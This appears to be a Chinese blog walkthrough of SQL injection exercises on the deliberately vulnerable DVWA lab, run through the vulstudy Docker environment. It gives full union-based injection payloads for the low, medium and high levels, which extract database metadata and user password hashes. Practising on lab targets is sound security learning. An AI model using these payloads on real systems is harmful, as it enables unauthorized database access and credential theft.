首页 > 数据库 >vulstudy之DVWAsql注入练习

vulstudy之DVWAsql注入练习

时间:2023-05-12 13:48:10浏览次数:45  
标签:union DVWAsql 练习 vulstudy 搭建 级别 select 注入

Vulstudy/DVWA sql注入练习

目录

Vulstudy/DVWA sql注入练习 

一.Vulstudy搭建 

二.Sql注入 

Low级别: 

medium级别 

High级别 

一.Vulstudy搭建

vulstudy vulstudy是专门收集当下流行的漏洞学习平台,并将其制作成docker镜像,方便大家快速搭建环境,节省搭建时间,专注于漏洞学习上。包含以下漏洞平台 下面就来详细介绍下环境搭建过程。

项目地址:

https://github.com/c0ny1/vulstudy.git

本人使用的是ubuntu7.5.0

命令:

git clone https://github.com/c0ny1/vulstudy.git

Cd DVWA

Docker-compose up -d 启动

访问浏览器,搭建成功

二.Sql注入

Low级别

1‘and 1=1

报错

1‘and 1=1#

猜字段

1‘and 1=1 order by 2 #

1‘and 1=1 order by 3 #

报错

可知显示字段只有两位。

联合查询

-1' union select 1,2#

发现注入成功,查询版本。

-1' union select version(),database()#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='users'

获取用户信息

1' union select user,password from users # 

挑一个密码md解密

medium级别

注入点不好判断,直接用burp抓包

id=1 and 1=1

没报错,注入点应为数字注入型

id=1 union select version(),2

后续思路和上一关一样,最后直接查询密码。

id=1 union select user,password from users #

High级别

所谓high级别就是报错只回显 Something went wrong 界面

其实和第一关差不多。

1' union select user,password from users#

至此DVWA sql注入靶场完成。

标签:union,DVWAsql,练习,vulstudy,搭建,级别,select,注入
From: https://www.cnblogs.com/fugodd-hacker/p/17393845.html

相关文章

  • c++打卡练习(25)
    回文数流程图:伪代码:源代码:#include<stdio.h>intmain(){ intm[16],n,i,t,count=0; longunsigneda,k; printf("No.numberit'ssquare(palindrome)\n"); for(n=1;n<256;n++) { k=0;t=1;a=n*n; for(i=0;a!=0;i++) { m[i]=a%10; a/=10; ......
  • 例程练习1
    例程练习4.1代码:CREATEUSERuser1WITHPASSWORD"user1@123";GRANTSELECTONTABLEstudentTOuser1;运行结果:4.2代码:CREATEUSERuser2WITHPASSWORD"user2@123";CREATEUSERuser3WITHPASSWORD"user3@123";GRANTALLP......
  • 例程练习3
    例程练习4.11代码:CREATEROLErole1PASSWORD"role1@123";尝试登录role1,但是登录被拒绝,应该是没有登录权限;创建新角色role2;CREATEROLErole2LOGINPASSWORD'role2@123';此时新角色可以登录,使用新角色在无权限的情况下对student表操作;给角色2授权GRANTSELECT,UPDA......
  • 例程练习2
    例程练习4.8代码:尝试使用user1账户收回\c-user1REVOKEUPDATE(sno)ONTABLEstudentFROMuser4;接着使用管理员账户收回REVOKEUPDATE(sno)ONTABLEstudentFROMuser4;运行结果4.9代码:user4账户尝试收回接着使用管理员账户收回REVOKESELECTONT......
  • 5-10打卡 练习
    typedefstructlist{ intdata; list*next;}list;list*initlist(){ list*a=newlist; a->data=0; a->next=NULL; returna;}voidpushback(list**h,intn){list*a=newlist;a->data=n;a->next=NULL;list*......
  • javascript基础练习
     本练习根据w3cschool:https://www.w3cschool.cn/javascript/javascript-conventions.html 1.javascript简介1.1JavaScript是脚本语言JavaScript是一种轻量级的编程语言。JavaScript是可插入HTML页面的编程代码。JavaScript插入HTML页面后,可由所有的现......
  • Java OOP 练习--银行客户管理
    AcountpublicclassAcount{privatedoublebalance;//余额//带参构造器publicAcount(doubleinitBalance){this.balance=initBalance;}//查询余额publicdoublegetBalance(){returnbalance;}//存钱......
  • c++打卡练习(23)
    亲密数如果整数A的全部因子(包括1,不包括A本身)之和等于B;且整数B的全部因子(包括1,不包括B本身)之和等于A,则将整数A和B称为亲密数。求3000以内的全部亲密数。流程图:伪代码:源代码:#include<iostream>usingnamespacestd;intmain(){ inta,i,b,n; printf("Therearefollowing......
  • c++打卡练习(22)
    判断一个数是不是完数流程图:伪代码:源代码:#include<iostream>usingnamespacestd;intmain(){ intN,i,j,S; cin>>N; for(i=2;i<=N;i++){ S=0; for(j=1;j<=(i/2);j++){ if(i%j==0){ S+=j; } if(S==i){ cout<<S<<""<<"is......
  • C/C++数据结构练习题[2023-05-08]
    C/C++数据结构练习题[2023-05-08]基本习题部分1字符串距离目的:字符串是一种基础且广泛使用的数据结构,与字符串相关的题目既可以考察基本程序设计能力和技巧,也可以考查算法设计能力。题目:求字符串之间距离要求:设有字符串X,称在X的头尾及中间插入任意多个空格后构成的新字......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99